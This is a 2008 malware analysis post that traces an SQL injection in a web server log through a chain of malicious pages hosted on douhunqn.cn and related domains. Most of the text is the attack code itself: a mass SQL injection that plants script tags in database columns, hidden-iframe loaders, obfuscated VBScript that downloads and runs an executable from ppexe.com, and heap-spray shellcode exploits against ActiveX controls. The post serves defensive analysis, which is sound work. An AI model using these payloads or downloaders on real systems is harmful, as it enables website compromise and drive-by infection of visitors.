Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0


The hex we're interested in, is the part that begins with 0x, and ends with F72 (look just before %20AS%20CHAR since %20 is just the space character). If we decode the hex, we end up with;

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


This tells us that it is an SQL exploit that injects the script from www0.douhunqn.cn. What does this script contain? The following of course;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/w.js
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 3
Date: 16 September 2008
Time: 02:21:49:21
*****************************************************************
window.onerror=function()
{
document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");
return true;
}
if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');


document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


This script is detected by AntiVir as JS/Dldr.IFrame.CR

You'll also notice that it grabs new.htm from the same domain, this is detected as HTML/IFrame.UX, and contains;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/new.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 4
iFrames: 9
Date: 16 September 2008
Time: 02:23:51:23
*****************************************************************
<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=06014.htm width=100 height=0></iframe>
<iframe src=flash.htm width=100 height=0></iframe>
<Iframe src=net.htm width=100 height=0></iframe>
<Iframe src=ff.htm width=100 height=0></iframe>
<Iframe src=tr.htm width=100 height=0></iframe>

<script>
var kaspersky="ffuck"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]()
try{if(new window["ActiveXObject"]("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31"))window["document"]["write"]('<iframe style=display:none src="lzx.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real11.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real10.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer"))window["document"]["write"]('<iframe style=display:none src="Bfyy.htm"></iframe>');}
catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script src="http://js.users.51.la/2094465.js"></script>


Oh dear, this is getting a little messy isn't it?. Lets see what this does shall we.

http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605

This is a counter that presumably, tells them how many times the script has been loaded.

http://www0.douhunqn.cn/csrss/06014.htm

This is the HTML/Rce.Gen infection, and gives us a lovely little executable called rondll32.exe (19.8KB), lovingly downloaded from ppexe.com (Ref: hpHosts Listing);

http://www.ppexe.com/csrss/rondll32.exe

It's downloaded via XMLHTTP and installed via the FileSystemObject (part of the Microsoft Scripting Runtime). For some peculiar reason, my attempts to download rondll32.exe failed (the download kept timing out).

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/06014.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 6
iFrames: 0
Date: 16 September 2008
Time: 02:31:35:31
*****************************************************************
<script language=VBScript>
On Error Resume Next
gameee = "http://www.ppexe.com/csrss/rondll32.exe"
Set gameee_2_cn = document.createElement("object")
gameeeid="clsid:"
gameeeidx="BD"
gameeeid2="96"
gameeeid3="C5"
gameeeid4="56-6"
gameeeid5="5A"
gameeeid6="3-1"
gameeeid7="1D"
gameeeid8="0-98"
gameeeid9="3A-0"
gameeeid10="0C0"
gameeeid11="4FC"
gameeeid12="29E"
gameeeid13="36"
dadong="classid"
gameee3="Micro"
gameee4="soft.XM"
giceeee="LHTTp"
gameee5="G"
gameee6="E"
gameee7="T"
gameee_2_cn.SetAttribute dadong, gameeeid&gameeeidx&gameeeid2&gameeeid3&gameeeid4&gameeeid5&gameeeid6&gameeeid7&gameeeid8&gameeeid9&gameeeid10&gameeeid11&gameeeid12&gameeeid13
Set lovegameee=gameee_2_cn.CreateObject(gameee3&gameee4&giceeee,"")
lovegameee.Open gameee5&gameee6&gameee7, gameee, False
lovegameee.Send
gameee_kiteggggggggg="Gameeeeeee.pif"
gameee_kitegggggggggs="Gameeeeeee.vbs"
Q123456="Scripting."
Q123456s="FileSyst"
Q123456ss="emObject"
Q123456sss="Adod"
Q123456sssx="b.stream"
Q123456sssss=Q123456sss&Q123456sssx
Set chilam = gameee_2_cn.createobject(Q123456&Q123456s&Q123456ss,"")
Set yingying = chilam.GetSpecialFolder(2)
gameeeuser="chilam"
gameee_kiteggggggggg=chilam.BuildPath(yingying,gameee_kiteggggggggg)
gameee_kitegggggggggs=chilam.BuildPath(yingying,gameee_kitegggggggggs)
Set chilams = gameee_2_cn.createobject(Q123456sssss,"")
chilams.type=1
chilams.Open
chilams.Write lovegameee.ResponseBody
</script>
<script language="JavaScript">
chilams["Savetofile"](gameee_kiteggggggggg,2);
</script>
<script language=VBScript>
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText "'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"&vbCrLf&"Set Love_gameee = CreateObject(""Wscript"&".Shell"")"&"'I LOVE gameee TEAM"&vbCrLf&"'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"&vbCrLf&"Love_gameee.run ("""&gameee_kiteggggggggg&""")"&vbCrLf&"'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"
chilams.Savetofile gameee_kitegggggggggs,2
chilams.Close
www="She"
cute="ll.A"
qq="ppl"
cn="ica"
kfqq="tion"
gameeedk="O"
gameeedks="p"
gameeedkss="e"
gameeedksss="n"
Set cute_qq_cn_qq_123456 = gameee_2_cn.createobject(www&cute&qq&cn&kfqq, "")
cute_qq_cn_qq_123456.ShellExeCute gameee_kitegggggggggs, "", "", gameeedk&gameeedks&gameeedkss&gameeedksss, 0
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">


http://www0.douhunqn.cn/csrss/flash.htm

This is detected as HEUR/HTML.Malware and loads yet more iFrames;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/flash.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 2
Date: 16 September 2008
Time: 02:45:17:45
*****************************************************************
<html>
<script>
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
var yt2="play=Yes";
var yt3="path=/";
var yt4="expires=";
var yt1=yt2+yt3+yt4;
document.cookie=yt1+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{

document.write("<iframe src=i1.html width=100 height=0></iframe>");
document.write("");
}


else{
document.write("<iframe src=f2.html width=100 height=0></iframe>");
document.write("");
}
}
</script>
</html>


i1.html, detected as JS/Dldr.Agent.CQ shows it's loading several SWF (flash) files, I've not checked these yet;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/i1.html
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 0
Date: 16 September 2008
Time: 02:47:38:47
*****************************************************************
<Script type="text/javascript" src="swfobject.js"></Script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "DZ";
var fuckaxp = "aa";
var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt1='rev';
}else if(version[yt1]==45){
var fuckavpxa = "P";
var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt2='rev';
}else if(version[yt2]==16){
var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==64){
var fuckavp = "DZ";
var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==28){
var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==47){
var fuckavpx = "DZ";
var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
document.getElementById('flashversion').innerHTML=""
}
}
}
</ScripT>


f2.html, detected as HS/Dldr.Agent.QI seems to do the same;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/f2.html
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 3
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 02:52:33:52
*****************************************************************
<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script language =javascript>
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "SB";
var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt1='rev';
}else if(version[yt1]==64){
var fuckavp = "SB";
var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
var yt2='rev';
}else if(version[yt2]==47){
var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==45){
var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==28){
var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==16){
var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
document.getElementById('flashversion').innerHTML=""
}
}
}
</script>


http://www0.douhunqn.cn/csrss/net.htm

This is a rather nice little file, that according to it's title, is a Visual Studio 0day exploit;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/net.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 02:54:25:54
*****************************************************************
<html>
<title>ÓêÌï Microsoft Visual Studio 0day Exploit!</title>
<script language="JavaScript">

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf1 = '';
for (i=1;i<=1945;i++)
{
buf1=buf1+unescape("%0c");
}

var Evilcutecode = unescape("%u56E8%u0000%u5300%u5655%u8B57%u246C%u8B18%u3C45%u548B" +
"%u7805%uEA01%u4A8B%u8B18%u205A%uEB01%u32E3%u8B49%u8B34" +
"%uEE01%uFF31%u31FC%uACC0%uE038%u0774%uCFC1%u010D%uEBC7" +
"%u3BF2%u247C%u7514%u8BE1%u245A%uEB01%u8B66%u4B0C%u5A8B" +
"%u011C%u8BEB%u8B04%uE801%u02EB%uC031%u5E5F%u5B5D%u08C2" +
"%u5E00%u306A%u6459%u198B%u5B8B%u8B0C%u1C5B%u1B8B%u5B8B" +
"%u5308%u8E68%u0E4E%uFFEC%u89D6%u53C7%u8E68%u0E4E%uFFEC" +
"%uEBD6%u5A50%uFF52%u89D0%u52C2%u5352%uAA68%u0DFC%uFF7C" +
"%u5AD6%u4DEB%u5159%uFF52%uEBD0%u5A72%u5BEB%u6A59%u6A00" +
"%u5100%u6A52%uFF00%u53D0%uA068%uC9D5%uFF4D%u5AD6%uFF52" +
"%u53D0%u9868%u8AFE%uFF0E%uEBD6%u5944%u006A%uFF51%u53D0" +
"%u7E68%uE2D8%uFF73%u6AD6%uFF00%uE8D0%uFFAB%uFFFF%u7275" +
"%u6D6C%u6E6F%u642E%u6C6C%uE800%uFFAE%uFFFF%u5255%u444C" +
"%u776F%u6C6E%u616F%u5464%u466F%u6C69%u4165%uE800%uFFA0" +
"%uFFFF%u2E2E%u005C%uB7E8%uFFFF%u2EFF%u5C2E%uE800%uFF89" +
"%uFFFF%u7468%u7074%u2F3A%u772F%u7777%u702E%u6570%u6578%u632E%u6D6F%u632F%u7273%u7373%u722F%u6E6F%u6C64%u336C%u2E32%u7865%u0065%u0000");

var evilcuteSize = (Evilcutecode.length * 2);

var CutespraySled = unescape("%u9090"+"%u9090");

var CuteAddress = 0x0c0c0c0c;

var CuteBlockSize = 0x100000;

var spraySledSize = CuteBlockSize - (evilcuteSize + 1);

var CuteheapBlocks = (CuteAddress+CuteBlockSize)/CuteBlockSize;

var x = new window["Array"]();

while (CutespraySled.length*2<spraySledSize)
{
CutespraySled += CutespraySled;
}

CutespraySled = CutespraySled.substring(0,spraySledSize/2);

for (i=0;i<CuteheapBlocks;i++)
{
x[i] = CutespraySled + Evilcutecode;
}

document.write(body+buf1+body1);

</script>
</html>


Malzilla had this to say about the u% escaped code;



http://www0.douhunqn.cn/csrss/ff.htm

Alas they really want you to have the executable from ppexe.com, as shown by the following, detected as EXP/SnapshotViewe.B

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/ff.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:00:02:00
*****************************************************************
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;

var x;
var obj;
var mycars = new Array();
mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";

var yt1="snpvw.Snapshot Viewer Control.1";
var objlcx = new ActiveXObject(yt1);

if(objlcx="[object]")
{

setTimeout('window.location = "ldap://"',3000);


for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")

var buf1 = 'http://www.ppexe.com/csrss/rondll32.exe';
var buf2=mycars[x];

obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;

try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();

}catch(e){}

}
}

</script>


http://www0.douhunqn.cn/csrss/tr.htm

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/tr.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 4
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:03:17:03
*****************************************************************
<iframe src=http://www.lukclick.com/search/51777.htm width=100 height=0></iframe>
<iframe src=http://www.letusearch.com/xiaoke.htm width=100 height=0></iframe>
<Iframe src=http://www.onegameplace.com/xiaoke.htm width=100 height=0></iframe>
<Iframe src=http://www.kkexe.com/key.htm width=100 height=0></iframe>


Yeesh!, they really want to give us as much as possible don't they?

*****************************************************************

vURL Desktop Edition v0.3.5 Results

Source code for: http://www.lukclick.com/search/51777.htm

Server IP: 208.53.147.195 [ . ]

hpHosts Status: Listed [ Class: EXP ]

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 2

iFrames: 7

via Proxy: MontanaMenagerie (US)

Date: 16 September 2008

Time: 03:05:58:05

*****************************************************************

<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title> ads </title>
</head>

<body>


<IFRAME src=http://www.afeisearch.com/portal.php?r=0&username=awei width=0 height=0></IFRAME>

<iframe src="http://www.u2clicks.com/portal.php?r=0&username=jiajia" width="0" height="0" name="cpm"></iframe>

<iframe src="http://www.values7.com/banners/view_ad.php?username=mhv88&format=1" style="border:none" name="advertising" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="31" width="88"></iframe>

<IFRAME src="http://www.kikclicks.com/engine/?ref=beibei" width=1 height=1></IFRAME>

<iframe width="0" height="0" src="http://www.lukclick.com/search/luckymouse.htm"></iframe>

<iframe width="0" height="0" src="http://www.lukclick.com/search/18889.htm"></iframe>

<iframe width=468 height=60 src='http://www.advpoints.com/promote15.php?uid=8918' frameborder=0 marginwidth=0 marginheight=0 vspace=1 hspace=1 allowtransparency=true scrolling=no></iframe>

</body>

<script src='http://goako.com/accounts_js_feed_wizard_display_results.php?idUser=3&username=test&keywords=work at home&adult_filter=off&results_number=10&results_display_style=vertical'></script>

<script src='http://s90.cnzz.com/stat.php?id=1033093&web_id=1033093&online=1&show=line' language='JavaScript' charset='gb2312'></script>

</html>


*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www.letusearch.com/xiaoke.htm
Server IP: 74.52.24.59 [ mail.wtowww.com ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:10:10:10
*****************************************************************
<iframe src=http://www.letusearch.com/search/d.php?aff=xiaoke width=0 height=0></iframe>


*****************************************************************

vURL Desktop Edition v0.3.5 Results

Source code for: http://www.onegameplace.com/xiaoke.htm

Server IP: 65.110.63.170 [ 65-110-63-170.static.sagonet.net ]

hpHosts Status: Listed [ Class: EXP ]

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 4

iFrames: 1

via Proxy: MontanaMenagerie (US)

Date: 16 September 2008

Time: 03:11:24:11

*****************************************************************

<HTML>
<HEAD><TITLE>OneGameplace</TITLE>
<META http-equiv=Content-Type content="text/html; charset=UTF-8">
</HEAD>
<BODY>
<iframe src=http://www.7scv.com/search/portal.php?username=xiaoke width='0' height='0' frameborder='0'></iframe>
<A href="http://www.51-search.com/search.php?query=Free+Games" target=_blank>Free Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Flash+Games" target=_blank>Flash Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Arcade+Games" target=_blank>Arcade Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Play+Online" target=_blank>Play Online</A> </LI></UL>
<H3><A
href="http://www.51-search.com/search.php?query=Free+Online+Games" target=_blank>Free Online Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Addicting+Games" target=_blank>Addicting Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Free+Fun" target=_blank>Free Fun</A>
<LI><A href="http://www.51-search.com/search.php?query=Sports+Games" target=_blank>Sports Games</A> </LI></UL>
<H3><A href="http://www.51-search.com/search.php?query=Action+Games" target=_blank>Action Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Adventure+Games" target=_blank>Adventure Games</A>

<LI><A href="http://www.51-search.com/search.php?query=Puzzle+Games" target=_blank>Puzzle Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Skills+Games" target=_blank>Skills Games</A>
</LI></UL>
<H3><A href="http://www.51-search.com/search.php?query=Shooting+Games" target=_blank>Shooting Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Fighting+Games" target=_blank>Fighting Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Work+at+Home" target=_blank>Work at Home</A>
<LI><A href="http://www.51-search.com/search.php?query=RPG+Games" target=_blank>RPG Games</A> </LI></UL></DIV><!-- dir left end --><!-- dir mid box -->

<DIV id=FT>© 2007-2008 OneGamePlace
</DIV>
</DIV><!-- footer end --></DIV></DIV></DIV></DIV><!-- main container end -->
<table border = "0">
<tr>

<td>

</td>


</tr>
</table>
<div id="eXTReMe"><a href="http://extremetracking.com/open?login=kkology">
<img src="http://t1.extreme-dm.com/i.gif" style="border: 0;"
height="38" width="41" id="EXim" alt="eXTReMe Tracker" /></a>
<script type="text/javascript"><!--
var EXlogin='kkology' // Login
var EXvsrv='s11' // VServer
EXs=screen;EXw=EXs.width;navigator.appName!="Netscape"?
EXb=EXs.colorDepth:EXb=EXs.pixelDepth;
navigator.javaEnabled()==1?EXjv="y":EXjv="n";
EXd=document;EXw?"":EXw="na";EXb?"":EXb="na";
EXd.write("<img src=http://e2.extreme-dm.com",
"/"+EXvsrv+".g?login="+EXlogin+"&",
"jv="+EXjv+"&j=y&srw="+EXw+"&srb="+EXb+"&",
"l="+escape(EXd.referrer)+" height=1 width=1>");//-->
</script><noscript><div id="neXTReMe"><img height="1" width="1" alt=""
src="http://e2.extreme-dm.com/s11.g?login=kkology&j=n&jv=n" />
</div></noscript></div>
<script language="javascript" type="text/javascript">

window.status="Done"

</script>
</body>
</html>


*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www.kkexe.com/key.htm
Server IP: 125.91.13.147 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:13:35:13
*****************************************************************
<iframe src="http://www.bbcseek.com/seo.php?ref=itxiaoke" width="780" height="700" frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>


http://www0.douhunqn.cn/csrss/real11.htm

This is detected as HTML/Shellcode.Gen and contains;

*****************************************************************

vURL Desktop Edition v0.3.5 Results

Source code for: http://www0.douhunqn.cn/csrss/real11.htm

Server IP: 121.11.76.85 [ Resolution failed ]

hpHosts Status: Listed [ Class: EXP ]

MDL Status: Not Listed

PhishTank Status: Not Listed

Scripts: 1

iFrames: 0

via Proxy: MontanaMenagerie (US)

Date: 16 September 2008

Time: 03:18:26:18

*****************************************************************

<SCRIPT language="javascript">

Hello="Hi";

var tcsafeobj="o"+"b"+"j"+"e"+"c"+"t";

tcsafe=document.createElement(tcsafeobj);

var tcsafeid="clsid:2F542A2E-EDC9-4B";

var tcsafeids="F7-8CB1-87C9919F7F93";

var tcsafeidx=tcsafeid+tcsafeids;

tcsafe["setAttribute"]("classid", tcsafeidx);

var tcsafe_ulr="%u7468%u7074%u2F3A%u772F%u7777%u702E%u6570%u6578%u632E%u6D6F%u632F%u7273%u7373%u722F%u6E6F%u6C64%u336C%u2E32%u7865%u0065%u0000";

var yt1="%uffff%ua164%u0030%u0000%u408b";

var yt2="%u6856%u4e8e%uec0e%ua3e8%u0000";

var yt3="%u8900%u1445%ue0bb%u020f%u8900";

var yt4="%u0544%u652c%u0000%u5600%u8d56";

var yt5="%u0320%u33f3%u49c9%uad41%uc303";

var yt6="%u5e00%u80bf%u020c%ub900%u0100";

var yt7="%u0c47%u6165%u0070%u5057%u55ff";

var yt8="%u1055%u06c7%u0c80%u0002%uc481";

var tcsafecode = window["unescape"]("%u90"+"90"+"%u90"+"90"+"%u90"+"90"+

"%u6090"+"%u17eb%u645e%u30a1"+"%u0000%u0500%u0800%u0000%uf88b"+"%u00b9"+

"%u0004"+"%uf300%uffa4%ue8e0%uffe4"+yt1+"%u8b0c"+

"%u1c70"+"%u8bad%u0870%uec81%u0200"+"%u0000%uec8b%ue8bb%u020f%u8b00"+"%u8503"+

"%u0fc0"+"%ubb85%u0000%uff00%ue903"+"%u0221%u0000%u895b%u205d%u6856"+"%ufe98"+

"%u0e8a"+"%ub1e8%u0000%u8900%u0c45"+yt2+"%u8900"+

"%u0445"+"%u6856%u79c1%ub8e5%u95e8"+"%u0000%u8900%u1c45%u6856%uc61b"+"%u7946"+

"%u87e8"+"%u0000%u8900%u1045%u6856"+"%ufcaa%u7c0d%u79e8%u0000%u8900"+"%u0845"+

"%u6856"+"%u84e7%ub469%u6be8%u0000"+yt3+"%u3303"+

"%uc7f6"+"%u2845%u5255%u4d4c%u45c7"+"%u4f2c%u004e%u8d00%u285d%uff53"+"%u0455"+

"%u6850"+"%u1a36%u702f%u3fe8%u0000"+"%u8900%u2445%u7f6a%u5d8d%u5328"+"%u55ff"+

"%uc71c"+"%u0544%u5c28%u652e%uc778"+yt4+"%u287d"+

"%uff57"+"%u2075%uff56%u2455%u5756"+"%u55ff%ue80c%u0062%u0000%uc481"+"%u0200"+

"%u0000"+"%u3361%uc2c0%u0004%u8b55"+"%u51ec%u8b53%u087d%u5d8b%u560c"+"%u738b"+

"%u8b3c"+"%u1e74%u0378%u56f3%u768b"+yt5+"%u3356"+

"%u0ff6"+"%u10be%uf23a%u0874%ucec1"+"%u030d%u40f2%uf1eb%ufe3b%u755e"+"%u5ae5"+

"%ueb8b"+"%u5a8b%u0324%u66dd%u0c8b"+"%u8b4b%u1c5a%udd03%u048b%u038b"+"%u5ec5"+

"%u595b"+"%uc25d%u0008%u92e9%u0000"+yt6+"%u0000"+

"%ua4f3"+"%uec81%u0100%u0000%ufc8b"+"%uc783%uc710%u6e07%u6474%uc76c"+"%u0447"+

"%u006c"+"%u0000%uff57%u0455%u4589"+"%uc724%u5207%u6c74%uc741%u0447"+"%u6c6c"+

"%u636f"+"%u47c7%u6108%u6574%uc748"+yt7+"%u8b08"+

"%ub8f0"+"%u0fe4%u0002%u3089%u07c7"+"%u736d%u6376%u47c7%u7204%u0074"+"%u5700"+

"%u55ff"+"%u8b04%u3c48%u8c8b%u8008"+"%u0000%u3900%u0834%u0474%uf9e2"+"%u12eb"+

"%u348d"+"%u5508%u406a%u046a%uff56"+yt8+"%u0100"+

"%u0000"+"%ue8c3%uff69%uffff%u048b"+"%u5324%u5251%u5756%uecb9%u020f"+"%u8b00"+

"%u8519"+"%u75db%u3350%u33c9%u83db"+"%u06e8%ub70f%u8118%ufffb%u0015"+"%u7500"+

"%u833e"+"%u06e8%ub70f%u8118%ufffb"+"%u0035%u7500%u8330%u02e8%ub70f"+"%u8318"+

"%u6afb"+"%u2575%uc083%u8b04%ub830"+"%u0fe0%u0002%u0068%u0000%u6801"+"%u1000"+

"%u0000"+"%u006a%u10ff%u0689%u4489"+"%u1824%uecb9%u020f%uff00%u5f01"+"%u5a5e"+

"%u5b59"+"%ue4b8%u020f%uff00%ue820"+"%ufdda%uffff"+tcsafe_ulr);



